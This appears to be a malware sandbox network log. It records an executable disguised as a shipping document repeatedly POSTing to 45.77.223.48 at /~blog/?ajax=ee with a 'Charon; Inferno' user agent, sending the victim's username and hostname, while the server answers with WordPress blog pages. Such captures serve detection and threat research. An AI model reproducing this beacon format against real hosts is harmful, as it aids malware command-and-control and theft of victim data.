Apr 25, 2024 09:43:27.715744019 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:27.715795040 CEST	761	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49820	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:27.987761021 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:28.115480900 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:28.941181898 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:28 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:28.941246033 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:28.949131966 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:28.949371099 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:28.949536085 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:28.949678898 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:28.949820995 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:28.949891090 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:28.949930906 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 25, 2024 09:43:28.949980974 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49821	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:29.212593079 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:29.338315010 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:30.139460087 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:29 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:30.139564991 CEST	70	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" />
Apr 25, 2024 09:43:30.139586926 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:30.146388054 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:30.146583080 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:30.146697998 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:30.146894932 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:30.147095919 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:30.147156954 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:30.147313118 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49822	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:30.405107021 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:30.530937910 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:31.361849070 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:30 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:31.361907005 CEST	64	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8
Apr 25, 2024 09:43:31.361972094 CEST	77	IN	Data Raw: 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: " /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:31.369494915 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:31.369570971 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:31.369694948 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:31.369793892 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:31.369925976 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:31.370008945 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:31.370086908 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49823	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:31.634110928 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:31.759985924 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:32.594166040 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:31 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:32.594182968 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:32.594274998 CEST	5	IN	Data Raw: 55 54 46 2d 38 Data Ascii: UTF-8
Apr 25, 2024 09:43:32.594414949 CEST	6	IN	Data Raw: 22 20 2f 3e 0a 09 Data Ascii: " />
Apr 25, 2024 09:43:32.594516039 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:32.604420900 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:32.604782104 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:32.604861975 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:32.604990005 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:32.605087042 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49824	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:32.856501102 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:32.984330893 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:34.032939911 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:32 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:34.032960892 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:34.033122063 CEST	11	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 Data Ascii: UTF-8" />
Apr 25, 2024 09:43:34.033159018 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:34.041162014 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:34.041817904 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:34.042032957 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
